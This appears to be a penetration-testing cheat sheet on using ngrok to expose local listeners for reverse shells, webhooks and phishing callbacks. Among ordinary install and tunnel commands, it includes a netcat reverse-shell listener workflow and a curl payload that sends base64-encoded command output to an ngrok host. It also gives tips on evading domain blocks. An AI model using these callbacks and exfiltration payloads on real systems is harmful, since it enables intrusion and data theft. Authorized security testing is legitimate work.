ngrok Cheat Sheet
Expose local services to the internet for reverse shells, webhooks, and phishing callbacks during authorized tests.
Overview
ngrok forwards public URLs to local ports — useful when the target must call back to you but you lack a public IP (labs, home networks). Also inspects HTTP requests via the web UI.
Authorized testing only. Use only on systems, networks, and accounts you own or have explicit written permission to test. Unauthorized access is illegal.
Install
Official install
curl -sSL https://ngrok-agent.s3.amazonaws.com/ngrok.asc | sudo tee /etc/apt/trusted.gpg.d/ngrok.asc >/dev/nullecho "deb https://ngrok-agent.s3.amazonaws.com buster main" | sudo tee /etc/apt/sources.list.d/ngrok.listsudo apt update && sudo apt install -y ngrokAuthenticate (dashboard authtoken)
ngrok config add-authtoken YOUR_TOKENEssential commands
HTTP tunnel to local web server
ngrok http 80TCP tunnel (paid plans / reserved often required)
ngrok tcp 4444Common workflows
Terminal 1 — listener
nc -lvnp 4444Terminal 2 — expose 4444 (if plan supports tcp)
ngrok tcp 4444Exfil / OOB via HTTP —
ngrok http 8000Payload: curl https://RANDOM.ngrok-free.app/?d=$(whoami|base64)
python3 -m http.server 8000Webhook testing (SSRF callback) —
ngrok http 8080Static domain (paid) —
ngrok http --domain=mydev.example.ngrok.app 3000~/.config/ngrok/ngrok.yml
version: "2"authtoken: TOKENtunnels:shell:proto: tcpaddr: 4444ngrok start shellFlags reference
ngrok http PORT | HTTP/HTTPS tunnel |
|---|---|
ngrok tcp PORT | Raw TCP forward |
ngrok tls PORT | TLS-terminated tunnel |
--log=stdout | Verbose logging |
ngrok config check | Validate config |
Dashboard 4040 | Request replay / inspect |
Tips
- Free tier URLs change each run — regenerate payloads when restarting ngrok.
- Some targets block ngrok.io domains — have backup (cloud VPS, bore, localhost.run).
- For engagements, prefer your own VPS over third-party tunnels when policy allows.
- Monitor the 4040 inspector for blind XSS/SSRF hits.